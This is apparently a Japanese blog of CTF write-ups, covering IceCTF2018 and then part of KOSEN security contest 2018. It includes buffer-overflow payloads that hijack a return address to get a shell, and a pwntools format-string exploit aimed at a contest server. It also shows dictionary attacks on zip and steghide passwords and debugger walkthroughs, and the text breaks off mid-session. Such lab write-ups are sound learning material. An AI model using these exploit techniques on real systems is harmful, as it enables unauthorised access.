IceCTF2018に参加したお話

はじめに

CTFtimeでみかけたIceCTFというものに参加したので、そこで解けた問題のwriteupを書きます。

目次

Binary Exploitation

Simple Overflow

問題ページに飛ぶと下記の画像のようなページが表示されます。 左側に概要と問題文、中央にアプリケーション、右側にアプリケーションのソースコードらしきものが表示されます。

f:id:ush1ken:20180912112822p:plain

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

const char* FLAG = "<REDACTED>"

void flag() {
    printf("FLAG: %s\n", FLAG);
}

void message(char *input) {
SHOW ORIGINAL
    char buf[16] = "Hello World!Hell";


SHOW ORIGINAL
    int secret = -889275714; // 0xcafebabe
    strcpy(buf, input);

    printf("You said: %s\n", buf);

    if (secret == 0xcafebabe) {
        flag();
    } else {
        printf("The secret is 0x%x\n", secret);
    }
}

int main(int argc, char **argv) {
    if (argc > 1){
        message(argv[1]);
    } else {
        printf("Usage: ./overflow <message>\n");
    }
    return 0;
}

問題は5つあり、それぞれ下記の通りでした。 1. Hello world! In the textbox in the middle, try entering Hello World!. Observe which variable within the code takes the value.

  1. Overflow! What happens if you write more than 16 characters into the buffer? Can you make the secret change?

  2. Take control Can you make secret take the value 1633771873 (0x61616161). Note that strings are stored in ASCII, and in ASCII, character number 0x61 is a.

  3. Little endian In most architectures, integers are read in reverse byte order from memory, in a method which is called Little endian. Can you make the secret take the value 1633837924 (0x61626364)?

  4. Escape from ASCII As you may see in the code, to get past the restrictions and retrieve the flag, secret needs to have a value of 0xcafebabe. However not all these characters are in ASCII! What will you do? それぞれ下記の通り入力するとフラグが得られました。

  5. Hello World!
  6. Hello World!aaaaa
  7. Hello World!aaaaaaaa
  8. Hello World!aaaadcba
  9. Hello World!aaaa\xbe\xba\xfe\xca

5問目でブラウザだとどうエスケープすればいいのか悩んだのですが、一緒に参加していたメンバーがシンプルにエスケープして、フラグを得られました。

Cave

問題ページに飛ぶと前問と同様に下記の画像のようなページが表示されます。

f:id:ush1ken:20180912120343p:plain

ソースコードからして、前問と同様にBoF脆弱性を利用して、シェルを奪う問題のようなので、解析をします。

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

void shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void message(char *input) {
    char buf[16];
    strcpy(buf, input);

    printf("The cave echoes.. %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1){
        message(argv[1]);
    } else {
        printf("Usage: ./shout <message>\n");
    }
    return 0;
}

この環境では普通にobjdumpreadelfgdbが使えるようなので、それらを使って解析をしました。 その結果、message関数にてstrcpy関数を読んだ直後のスタックの状態を見て見ると下記のようになっていました。 入力バッファの先頭から29バイト以降にリターンアドレスらしきものがあるので、そこをshell関数のアドレスに変更できればshell関数を呼び出すことができます。

(gdb) x/32wx 0xffffd6c0
0xffffd6c0:     0x41414141      0xffffd700      0xf7ffcd00      0x00040000
0xffffd6d0:     0x00000000      0x00000000      0xffffd6f8      0x080485c2
0xffffd6e0:     0xffffd8dc      0xffffd7a4      0xffffd7b0      0x080485a5
0xffffd6f0:     0xffffd710      0x00000000      0x00000000      0xf7e28286
0xffffd700:     0x00000002      0xf7fc3000      0x00000000      0xf7e28286
0xffffd710:     0x00000002      0xffffd7a4      0xffffd7b0      0x00000000
0xffffd720:     0x00000000      0x00000000      0xf7fc3000      0xf7ffdc0c
0xffffd730:     0xf7ffd000      0x00000000      0x00000002      0xf7fc3000

ということで、下記のようなペイロードでフラグを得られました。

[adversary ~/cave]$ ./shout `python -c 'print("A"*28+"\x0b\x85\x04\x08")'`
The cave echoes.. AAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                              �
sh-4.4$ ls
flag.txt  Makefile  shout  shout.c
sh-4.4$ cat flag.txt
IceCTF{i_dont_think_cavemen_overflowed_buffers}

Flag: IceCTF{i_dont_think_cavemen_overflowed_buffers}

Forensics

Modern Picasso

Description

Here's a rendition of some modern digital abstract art. Is it more than art though?

f:id:ush1ken:20180913140556g:plain

上のようなpicasso.gifが与えられます。 一枚一枚の画像を見ると、細かい点のようなものが少しずつうつっています。 ということで、pythonで分解して、andをとったらフラグが出てきました。

from PIL import Image, ImageSequence

if __name__ == "__main__":
  im = Image.open("picasso.gif")
  frames = (frame.copy () for frame in ImageSequence.Iterator(im))
  for i, f in enumerate(frames):
    name = 'p-{}.png'.format(i+1)
    f.save(name)
from cv2 import *

if __name__ == "__main__":
  dst = imread('p-1.png')
  for i in range(2, 68):
    im = imread('p-'+str(i)+".png")
    dst = bitwise_and(im,dst)
  imwrite('output.png', dst)

f:id:ush1ken:20180913141022p:plain

Flag: IceCTF{wow_fast}

Hard Shells

Description

After a recent hack, a laptop was seized and subsequently analyzed. The victim of the hack? An innocent mexican restaurant. During the investigation they found this suspicous file. Can you find any evidence that the owner of this laptop is the culprit?

パスワードのかかったzipが与えられるので辞書攻撃でパスワードを探します。

# fcrackzip -u -D -p rockyou.txt hardshells.zip 

PASSWORD FOUND!!!!: pw == tacos
# unzip hardshells.zip 
Archive:  hardshells.zip
   creating: hardshells/
[hardshells.zip] hardshells/d password: 
  inflating: hardshells/d 
# file hardshells/d 
hardshells/d: Minix filesystem, V1, 30 char names, 20 zones

パスワードはtacosのようです。 中を見てみるとなにやら、Minix filesystemなるものがありました。

MINIX file system -Wikipedia

The MINIX file system is the native file system of the MINIX operating system.

MINIX OSファイルシステムのようです。

# strings hardshells/d | head -10
dat~
IHDR
IDATx
vQ[m
owWO
;1t'
j{w]n
tUiz5
rI_G
&1|a

とりあえずstringsコマンドで見てみると、IHDRIDATなどの文字列が見えます。 つまり、このdというファイルはpngファイルを含んでいることがわかります。

# binwalk hardshells/d 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
60457         0xEC29          Zlib compressed data, default compression

しかし、binwalkコマンドで中を見てみても何もファイルが出てこないので、バイナリエディタでのぞいてみると、どうやらマジックナンバー89 50 4E 47ではなく、89 50 55 47になっていることが確認できます。 ということで、55の部分を4Eにしてあげて、ファイルを保存しなおし、再度binwalkコマンドでextractすると、EC00.pngが出てきます。

# binwalk --dd="png" d

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
60416         0xEC00          PNG image, 1920 x 1080, 8-bit/color RGBA, non-interlaced
60457         0xEC29          Zlib compressed data, default compression
184532        0x2D0D4         LZMA compressed data, properties: 0x76, dictionary size: 2097152 bytes, uncompressed size: 2640046703830451273 bytes
209144        0x330F8         LZMA compressed data, properties: 0x6C, dictionary size: 2097152 bytes, uncompressed size: 758602624453919817 bytes

しかしこれを開いてみても画像の上部しか表示されないため、exiftoolで情報をのぞいてみると、Warningが出ていることがわかります。

# exiftool -v EC00
  ExifToolVersion = 10.32
  FileName = EC00
  Directory = .
  FileSize = 5182464
  FileModifyDate = 1536819835
  FileAccessDate = 1536819845
  FileInodeChangeDate = 1536819835
  FilePermissions = 33188
  FileType = PNG
  FileTypeExtension = PNG
  MIMEType = image/png
PNG IHDR (13 bytes):
  + [BinaryData directory, 13 bytes]
  | ImageWidth = 1920
  | ImageHeight = 1080
  | BitDepth = 8
  | ColorType = 6
  | Compression = 0
  | Filter = 0
  | Interlace = 0
  Warning = Bad CRC for IDAT chunk
  Warning = Invalid PNG chunk size

もう一度、バイナリエディタで見てみると、1つめのIDAT chunkのlengthが0x2000バイトなのに対し、2つめのIDAT chunkまでのlengthが0x2400バイトあることに気づきました。 初めはlengthが間違えているのかと思ったのですが、間にあるバイト列をざーっと見てみると、明らかにゴミのようなバイト列が混じっており、区切りのいいところまで選択してみるとちょうど0x400バイト分ありました。

f:id:ush1ken:20180913153525p:plain

ということで、この0x400バイト分と、pngファイルの前後にあった0x00のバイト列を全て消して画像として開いたところフラグが得られました。

f:id:ush1ken:20180913153719p:plain

Flag: IceCTF{look_away_i_am_hacking}

Lost in the Forest

Description

You've rooted a notable hacker's system and you're sure that he has hidden something juicy on there. Can you find his secret?

fsというディレクトリが与えられるので、ここからフラグを探していきます。

$ ls fs/
bin   dev   home  media opt   root  sbin  sys   usr
boot  etc   lib   mnt   proc  run   srv   tmp   var

treeコマンドでディレクトリの全体を見てみると、hkrというユーザーがいることがわかりました。

$ tree -a fs/
fs/
...
├── home
│   └── hkr
│       ├── .bash_history
│       ├── .bash_logout
│       ├── .bash_profile
│       ├── .bashrc
│       ├── .profile
│       ├── .ssh
│       │   └── authorized_keys
│       ├── Desktop
│       │   └── clue.png
│       ├── Documents
│       ├── Downloads
│       ├── Music
│       ├── Pictures
│       │   ├── ngsn2dhjtM1sulnzno1_500.jpg
│       │   ├── ngw04qs2ah1r2r2hco1_500.jpg
│       │   ├── ngw06omoVx1r2r2hco1_500.jpg
...
│       │   ├── nrfh6lK0LK1t0ge0qo1_500.jpg
│       │   ├── nrgufoLBGp1uxhpyfo1_1280.jpg
│       │   └── nrjp4inobM1uvfeuho1_500.jpg
│       ├── Videos
│       └── hzpxbsklqvboyou
...

hkrユーザーのPicturesディレクトリにたくさん画像が入っていたので、そこにヒントがあるのかなあと思ったのですが特に怪しいものはありませんでした。 つぎに.bash_historyを見てみると、なにやらダウンロードしたスクリプトsecretというファイルを処理した結果をhzpxbsklqvboyouというファイルに流し込んでいました。

# cat fs/home/hkr/.bash_history
...
wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf
5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp
...
mv eRkjLlksZp tool.py
...
./tool.py ../secret > ../hzpxbsklqvboyou
...
shred secret
...

ということで、スクリプトtool.pyとして保存して中を見ます。

# curl https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp > tool.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:-- 100   364  100   364    0     0   1923      0 --:--:-- --:--:-- --:--:--  1925
#!/usr/bin/python3
import sys
import base64

def encode(filename):
    with open(filename, "r") as f:
        s = f.readline().strip()
        return base64.b64encode((''.join([chr(ord(s[x])+([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x]) for x in range(len(s))])).encode('utf-8')).decode('utf-8')[::-1]*5

if __name__ == "__main__":
    print(encode(sys.argv[1]))

受け取ったファイルの中身をencode関数でエンコードして出力するスクリプトのようなので、下記のようなスクリプトを書いてデコードするとフラグが出てきました。

#!/usr/bin/python3
import sys
import base64

def decode(filename):
    with open(filename, "r") as f:
      enc = f.readline().strip()
      enc = enc[0:int(len(enc)/5)]
      s =  base64.b64decode(enc[::-1].encode('utf-8')).decode('utf-8')
      l = [chr(ord(s[x])-([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x])for x in range(len(s))]
      return "".join(l)

if __name__ == "__main__":
    print(decode(sys.argv[1]))
# python tool.py fs/home/hkr/hzpxbsklqvboyou 
IceCTF{good_ol_history_lesson}

Flag: IceCTF{good_ol_history_lesson}

Steganogprahy

Drumbone

Description

I joined a couple of hacking channels on IRC and I started recieving these strange messages. Someone sent me this image. Can you figure out if there's anything suspicous hidden in it?

f:id:ush1ken:20180913180933p:plain

某Elliot氏の画像が与えられるので、とりあえずStegSolveでペラペラとビット抽出をしてみます。 すると、Blueの0ビット目のみを抽出した画像で、なにやらQRコードのようなドットが浮き上がってくるので、solved.bmpとしてこの画像を保存します。

f:id:ush1ken:20180913181219p:plain

ということで下記のスクリプトで整形すると、QRコードが得られました。

from PIL import Image
if __name__ == "__main__":
  im = Image.open("solved.bmp")
  pix = im.load()
  qrcode = []
  for i in range(0,29):
    line = []
    for j in range(0,29):
      line.append('\033[48;5;255m \033[0m'*2 if sum(pix[1+6*i,1+6*j]) == 0 else ' '*2)
    print("".join(line))
  qrcode.append(line)

f:id:ush1ken:20180913182059p:plain

Flag: IceCTF{Elliot_has_been_mapping_bits_all_day}

ちなみに、Drumboneでggると、Blue Man Groupというアーティストの楽器の名前であることがわかります。 そのことから青の0ビット目を抽出すると予想するのが正攻法だったのかもしれません。

Hot or Not

DESCRIPTION

According to my friend Zuck, the first step on the path to great power is to rate the relative hotness of stuff... think Hot or Not.

ファイルサイズのデカイ、以下のような画像(配布画像のスクリーンショット)が得られます。

f:id:ush1ken:20180913183044p:plain

拡大してみると、犬とホットドッグが87×87個並んでいることがわかりました。 ここでチームメンバーの一人が、ドラマSilicon valleyNotHotDogが元ネタじゃない?と教えてくれたので、適当に画像を分割して、gitに落ちていた識別器を使って識別しました。(識別には90分ほどかかりました。)

github.com

000000010100001000000000100111111111111000111111000000000111111000000000000000000010000000100000000010000000100000111111111111000111111000000000111111000000000000010001000100000000001010100010000000000111111111111011111111100000000111111000000000000000000001000001000001100000000000000111111000001000000111000111000010111000101000000000000010000000010000000000000000000000111111000000000001111001111000000111111000000000000000001000000000100000000000000010000111111000110110101111000111001000111000000000000000010000001000001000000000010100100100000111111100111111111010111111100100000001000010000000100110000100000010100100000100100010111111000111111111110111111000000000100000010000000001000000000000000001001101010000000111111010111111111010111111000000000100001101011000010000000000001100001000001000000000111001000000111010000001000000100000010000010000000010001000000010000000000000100000000111010000000111010000100001010110100000000000000000010010010010000000000000000010000100111000001000111000100000000000001000100010000100011000000001100000000000000110010000001000111000111110111000000111010000000000010101000000000000010000000000000001001000000000011111000111010111010100111000000000010001100010000001000010000101000000000000011000000010111010111100111011100111000000000000011000100100001000000000000000100001000000000111111001111001000111111000111000111111001010000100000010100000010000000000000000000000111111000111100000111111000111000111111001110000000000000000010000000000000000000000000111111000111000001111111001111100111111000000000000000001001000000010100000100000001000111001111100111001111000111101111000111001000101001000110000000000000000000000000000010111000111011111010111010111000111000111000000000000000010000001001000000100000000000000111000111011111000111000111010111000111000000010010000000011000000000010000001100000101111000000111111010010101111000010000111010100000000000000000001000100000100000000001100111000100111111000000000111100000000111000000000000001000001000000000000000000001110000111000000111111000010000111000000000111000100001100000001100000010000000010111111111111001000010000111111000111111010000111111000111111010100000111000000000101000111111111111000001010000111111010111111100100111111000111111010001010111100000000000001111111111111101110000000111111000111111000000111111100111111001001000111000111111111111111111010001111000111111111010000000000000111111000111111010111000111000111111111111111111111101001111000111111111000001000000000111111000111111000111000111001111111111111111111111100000111101111111111000001000101100111111000111111010111000111000111000111111111100111111111001111100110111111111000010111111111000000111111000111111000111000111111111001111111111001111010011111111111001010111111111000010111111000111111011111001111111111010111111111000111100000111111111000000111111111000000111111000111111000111111111001111000000000000111111111000111111000101111000100111111111000010100000000000111111111000111000000000000111111111001111111000000111010001111111111001000000000000010111111111000111000011000000111111111000111111000011111010010111111111000000010000000000111000000111111111001111000111111010000111000111111111000000010100111001000111100000010111001110111111111001111000111111000000111010111111111001001000010111000010111010000101111000001111111111000111000111111000000111000111111111010000100000111000010111011000010111111111000010010111100100000111001111000000001111000111111000001111111111111111111000111111111001011000111000000100111000111000001000111000111111000000111111111111111111001111111111000000001111100001011111001111100000000111000111111000000111111111111111111001111000000000111111111111111000000010111000111111000111100001010100111111111001111111110111010000000111111111111111000000000111001111111000111000010000000111111111000111111011111000000100111111111111111000100000111010111111000111000000001010111111111000111111000111000111111000001111000000011111111111111111000000000000111000000111111000000111000000001010111111100000111101001000111111111111111000010000000111000010111111000100111001001001100111111101010111000010100111111111111111000000100000111000000111111100000111000001000111111111111111010111000111111111010111111111111111111111111111111100110010111011111110111111111111111000111100111111111000111111111111111111111111111111000000010111000111000111111111111111000111000111111111000111111111111111111111111111111001000000111101111000111111010000100101101100100111000111010101100111111111111111111110111111111111111000000111111000000000000010000001111001111000100000111111111111111111110111111111111111000100111111000000000000000000010111100111010010010111111111111111111000111111111111111010000000000111111111000111001111000000000111000101001000111010000111111100000000111000010111010010111111111000111001111000000000111000000000000111000001111111100000000111001010111000000111111111000111000111000000100111101000000000111010000111111000110100111000100111010001111111111000000111111111010000111111000000111011100000111000000111111111000000111101001111111111001000111111111000000111111000010111000010000111000000111111111000000111000010111111111000000111111111000000111111010001111000000000111000010111111111100000111111111000111001000111000111010111000111101000000000111111000111111111111111000100111100111111000111100100111000111000111000111000100000000111111000111111111111111000000111010111111100111001000111000111100111000111000000000011111111000111111111111111000000111000000000000001100000100000111010111111001000111000011000111000111001001101111100111010111000001000000000000000000111000111111000000111000000001111000111100100000111100111000111000010000000000100001010111000111111110000111000000000111000111000001000111000111000111010000010100000000000000111111010000111001111100111001000111111100111000111111100000111100010100000000000100000111111010100111010111000111000000111111000111000111111000000111000010001000000000000000111111000000111000111100111000000111111000111000111111100000111000000100100100001100000111111111111111111111111100111100000111000000000111111010000111000000000100010000101000111111111111111111111111000111000000111000000100111111000000111100000000010001111000001111111111111111111111111000111000001111001000100111111000000111000000001001010000100000111000111000111000111111010111111111111111111111111111111000000001000100000000000010000111000111000111001111111000111111111111111111111111111111000000000000000011010000010001111010111000111000111111000111111111111111111111111111111010000010000011000010000000000000111111000000000000000111000111111111111000111111100111111000000000001000100010000010000111111000000000000010111100111111111111001111111010111111000000000000100000000000000001111111010101000000100111001111111111111001111111100111111010110000000000100000000000000000111111111111111111111111000000111111000010000011000111111000000000000000000000001000000111111111111111111111111000000111111010000010000100111111000000000000001110000000100010111111111111111111111111100010111111000100001000000111111010000010000000000000110001000000111111111000001111000010111111000111001111111100111111000010011000010000000000100000000111111111010001111000001111111001111000111111000111111110000000000000010001010000000010111111111000001111000000111111010111111111111100111111000000000100000000100000000000000000111111111111000001111000111111111100111000001111000000000000000000000000000101000000001111111111111000000111010111111111000111000110111001000101000001000000000001000000000011111111111111000010111100111111111110111001011111000

そして、この結果をスクリプトで整形して出力するとQRコードが出てきました。

def reset_dict(n):
  cand = {}
  for i in range(n):
    cand[i] = 0
  return cand

if __name__ == "__main__":
  with open("l.txt", "r") as f:
    l = f.read()
  l = list(l[:-1])
  cand = reset_dict(29)
  qr = []
  x = y = n = 0
  for i in range(len(l)):
    x = i%3
    cand[n] += int(l[i])
    if x == 2: n += 1
    if n == 29: y += 1; n = 0
    if y == 3:
      for j in range(29):
        if cand[j] > 4: qr.append(0)
        else: qr.append(1)
      cand = reset_dict(29)
      y = 0

  x = y = 0

  b_a = [0,1,2,3,4,5,6]
  b_b = [22,23,24,25,26,27,28]
  b_c = [0,6]
  b_d = [22,28]
  b_e = [2,3,4]
  b_f = [24,25,26]

  for i in range(len(qr)):
    if x in b_a+b_b and y in b_c: qr[i] = 0
    if x in b_a and y in b_d: qr[i] = 0
    if x in b_c and y in b_a+b_b: qr[i] = 0
    if x in b_d and y in b_a: qr[i] = 0
    if x in b_e+b_f and y in b_e: qr[i] = 0
    if x in b_e and y in b_f: qr[i] = 0
    x += 1
    if x == 29: y += 1; x = 0

  ans = []
  for i in range(len(qr)):
    if qr[i] == 0: ans.append("\033[48;5;255m \033[0m"*2)
    else: ans.append("\033[48;5;0m \033[0m"*2)
    x = i+1
    if x % 29 == 0: 
      ans.append("\n")
  print("".join(ans))

f:id:ush1ken:20180913184259p:plain

Flag: IceCTF{h0td1gg1tyd0g}

Rabbit Hole

たまねぎの画像だけが与えられます。

f:id:ush1ken:20180914015345j:plain

青い空を見上げればいつもそこに白い猫を使って調査をしていると、ステガノグラフィー->ビット抽出->ビット表示スクリーンに下記のような文言が書いてありました。

[フォーマット解析情報]
タイプ:JPEG
355 x 355 (0x163 x 0x163)  24bits  14311 (0x37E7)Byte
Steghide適用可能性あり

Steghideを適用した可能性があるということなので、Steghideのパスフレーズを辞書攻撃で求めます。

github.com

# ./steg_brute.py -b -d password.lst -f rabbithole.jpg 

 [i] Searching...
 61%|##################################################################################                                                   |

 wrote extracted data to "rabbithole_flag.txt".


 [+] Information obtained with password: onion

wsqxiyhn23zdi6ia

ということで、パスワードはonionwsqxiyhn23zdi6iaという文字列がでてきました。

これがフラグかと思ったのですが、どうやら違うようでwsqxiyhn23zdi6ia.onionというディープなウェブサイトにアクセスする必要があるようです。 アクセスすると以下のようなサイトを閲覧できます。

f:id:ush1ken:20180914020435p:plain

どうやら、この緑の文字の部分に何かが隠されているようです。 ということで、ソースコードをダウンロードし、html部分を除いたものをsrcというファイルとして保存します。

最初は、この文字列はUTF-8でダブルエンコーディングされた文字列なのかなあと最後まで悩んでいたのですが、CTF終了後に聞く話によればbase65536エンコードされているとのことでした。 ということで、pip install base65536して下記のスクリプトを実行します。

import base65536
if __name__ == "__main__":
 with open("src") as f:
    s = f.read().split()[0]
 somefile = base65536.decode(s)
 with open("somefile", "wb") as f:
    f.write(somefile)
# python dec.py 
# ls
dec.py   somefile src
# file somefile 
somefile: Zip archive data, at least v1.0 to extract
# unzip somefile 
Archive:  somefile
   creating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/titlepage.xhtml  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/stylesheet.css  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/cover.jpg  
   creating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/META-INF/
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/META-INF/container.xml  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1_html_36fa3f12.png  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1.ch.fixed.fc.tidied.stylehacked.xfixed_split_001.html  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1_html_2213599d.png  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1_html_m54ba1c00.png  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/content.opf  
 extracting: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/mimetype  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/toc.ncx  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1_html_m5fceb080.png  
  inflating: smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1.ch.fixed.fc.tidied.stylehacked.xfixed_split_000.html 

base65536デコードしたものをファイルに出力すると、あら不思議zipファイルが出てきました。

# cd smashwords-epub-90dd9972-b607-4a17-8947-3e8521ec89b9/
# grep -r IceCTF .
./tmp_d3791a07c3328ac61e1f9209362aeadf_yuXQg1.ch.fixed.fc.tidied.stylehacked.xfixed_split_001.html:down with The Post's Alice Rhee to explain. IceCTF{if_you_see_this_youve_breached_my_privacy} (Thomas LeGro/The

zipファイルを展開して、(もう真面目にフラグを探す気力もないので)脳死grepコマンドを打ったらフラグが出てきました。

Flag: IceCTF{if_you_see_this_youve_breached_my_privacy}

Reverse Engineering

Description

This is a fancy looking lock, I wonder what would happen if you broke it open? Note: You can download the binary here

実行ファイルを実行してみると、Enter key:でキーを入力しろと言われます。

$ ./lock
This is a pesky lock.. do you think you can open it?
Enter key: aaaa
key failed

キーの判定場所を探します。

f:id:ush1ken:20180913192507p:plain

上の図から、strlen_920という関数の返り値によって右(シェルをとれる)か、左(そのままexitする)かに分かれていることがわかります。

f:id:ush1ken:20180913192512p:plain

strlen_920という関数の中を見てみると、関数中央から下で何らかの文字列をmemfrob関数でエンコード(デコード)し、その結果と入力文字列が入っていると思われる変数をstrcmp関数で比較していることがわかります。 ということで、(相変わらずradare2の静的解析の方法を調べていないため)gdbで動的解析を行います。

# gdb -q lock
Reading symbols from lock...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x67f
(gdb) run
Starting program: /root/ctf/icectf/LockedOut/lock 

Breakpoint 1, 0x5655567f in main ()
(gdb) b *0x565556e9
Breakpoint 2 at 0x565556e9
(gdb) c
Continuing.
This is a pesky lock.. do you think you can open it?
Enter key: AAAA

Breakpoint 2, 0x565556e9 in main ()

まず、main関数にブレークポイントを仕掛けて、さらに先ほどのradare2で見つけたstrlen_920という関数にもブレークポイントを仕掛けて、その関数まで処理を進めます。 さらに、入力文字列となんらかの文字列を比較しているstrcmp関数の手前まで処理を進めます。

(gdb) x/s $esi
0x56558980:     "aXat9r45UtyMjw4i5Wh8swVWmEg3vAbWZaijTWP8"

strcmp関数まで進めて、引数の文字列を調べてみると、上記のような文字列が出力されます。 これがキーではないかと、予想して、再度バイナリを実行してこの文字列を入力してみます。

[adversary ~/lockedout]$ ./lock
This is a pesky lock.. do you think you can open it?
Enter key: aXat9r45UtyMjw4i5Wh8swVWmEg3vAbWZaijTWP8
unlocked!
sh-4.4$ ls
flag.txt  lock
sh-4.4$ cat flag.txt
IceCTF{you_m3ddling_k1ds}

Flag: IceCTF{you_m3ddling_k1ds}

おわりに

QRコードが出てきたときの快感を覚えてしまいました。 WebとCryptoにまったく手がでずつらい。精進したいです。

KOSEN セキュリティコンテスト 2018( #kosensc ) に参加したおはなし

はじめに

KOSENセキュリティコンテスト2018にJAJAとして参加しました。
今年でkosenscは3回目ですが、今年が一番手応えがあったかなと思います。 結果として、JAJAは2位で終わることができました。

今回は、競技期間中に僕が解けた問題について備忘録程度のWriteupを書きます。 また、Writeupにて、出力や入力が極端に長い場合、...として省略させていただきます。

f:id:ush1ken:20180903005354p:plain

目次

03 printf (Binary 100)

[問題内容] フラグを読み出せ! ゲームへの接続方法: nc [hostname] [port] 例: nc 27.133.152.42 80

メンバーの一人がほぼ解けていたが、最後に助太刀した問題。 普通にアクセスして、何か打ち込むと以下のようにthe secretの格納アドレスが得られる。

$ nc 27.133.152.42 80
the secret is in 0xff84a9de
what do you want: A
there is no A

printfというタイトルから書式指定文字列攻撃を利用する、ということがわかるらしい。 ということで、下記のような入力を与えると、スタックのデータが覗ける。

$ python -c "print('AAAA'+' %p'*20)" | nc 27.133.152.42 80
the secret is in 0xff930d2e
what do you want: there is no AAAA 0x100 0xf7fae5c0 (nil) (nil) (nil) (nil) 0x43530000 0x45534f4b 0x73757b4e 0x72705f65 0x66746e69 0x726f635f 0x74636572 0x7d796c 0x41414141 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025

4バイト×15個先に入力したAAAA(0x41414141)があるので、そこにthe secretの格納アドレスをうまく入れて、そこをさらに参照できれば、フラグが得られる。 メンバーからpayload(格納アドレス%15$s)をもらったので、そのままpwntoolsで投げる。

from pwn import *

conn = remote("27.133.152.42", 80)
str = conn.recvline()
pay = p32(int(str[-11:-1], 16))+"%15$s"
conn.sendline(pay)
print(conn.recvline())
# python printf.py 
[+] Opening connection to 27.133.152.42 on port 80: Done
what do you want: there is no \x0e<\x8a\xffSCKOSEN{use_printf_correctly}

[*] Closed connection to 27.133.152.42 port 80

Flag: SCKOSEN{use_printf_correctly}

04 XOR,XOR (Binary 200)

[問題内容] アセンブリを読んでフラグを入手しろ!

asmreadingという実行ファイルが与えられる。 普通に実行しても何も起きないので、解析する。

$ file asmreading 
asmreading: ELF 32-bit LSB pie executable Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=255dacefca5f60eeb7fca2ac73852c27c1e8070f, not stripped
$ ./asmreading

アセンブリをまじまじと読みたくはないので、とりあえずradare2

$ r2 -d asmreading 
[0xf77b9250]> aaa
[0xf77b9250]> afl
...
0x565b0549    1 4            sym.__x86.get_pc_thunk.dx
0x565b054d    4 83           sym.xor_func
0x565b05a0    3 336          sym.main
0x565b06f0    1 4            sym.__x86.get_pc_thunk.ax
...
[0xf77b9250]> s sym.main
[0x565b05a0]> VV
[0x565b05a0]> VV @ sym.main (nodes 3 edges 2 zoom 100%) BB-SUMM mouse:canvas-y movements-speed:5                                           

                      .-------------------------------------------.
                      | [0x565b05a0] ;[gd]                        |
                      | 0x565b05b1 call sym.__x86.get_pc_thunk.ax |
                      | 0x565b06ca call sym.xor_func              |
                      `-------------------------------------------'
                              | |
                              | '-------------------------.
          .-------------------'                           |
          |                                               |
          |                                               |
   --------------------------------------------.    .--------------------.
  |  0x565b06e3 ;[gf]                          |    |  0x565b06e8 ;[gc]  |
  | 0x565b06e3 call sym.__stack_chk_fail_local |    `--------------------'
  `--------------------------------------------'

上記の図だとかなり省略しているが、call命令の間にたくさんmov命令でxor_funcの引数らしきものを用意しているので、きっとxor_funcでそれをxorするとフラグがでてくるのだろうと、予測がつく。 ただし、やはりアセンブリを読むのはめんどくさいので、そのままデバッガでブレークポイントを仕掛けて、xor_funcの返り値を見てみる。 (ここではradare2の動的解析には慣れてないのでgdbをつかう)

はじめに、xor_funcの返り値を見るために、xor_funcブレークポイントを仕掛けて、xor_funcを実行する。

$ gdb -q asmreading
Reading symbols from asmreading...(no debugging symbols found)...done.
(gdb) b xor_func
Breakpoint 1 at 0x551
(gdb) run
Starting program: /root/workspace/ctf/kosensc2018/Binary_200/asmreading 

Breakpoint 1, 0x56555551 in xor_func ()
(gdb) n
Single stepping until exit from function xor_func,
which has no line number information.
0x565556cf in main ()
(gdb) layout asm
   ┌──────────────────────────────────────────────────────┐
   │0x565556ba <main+282>   movb   $0x14,-0xd(%ebp)       │
   │0x565556be <main+286>   lea    -0x69(%ebp),%eax       │
   │0x565556c1 <main+289>   push   %eax                   │
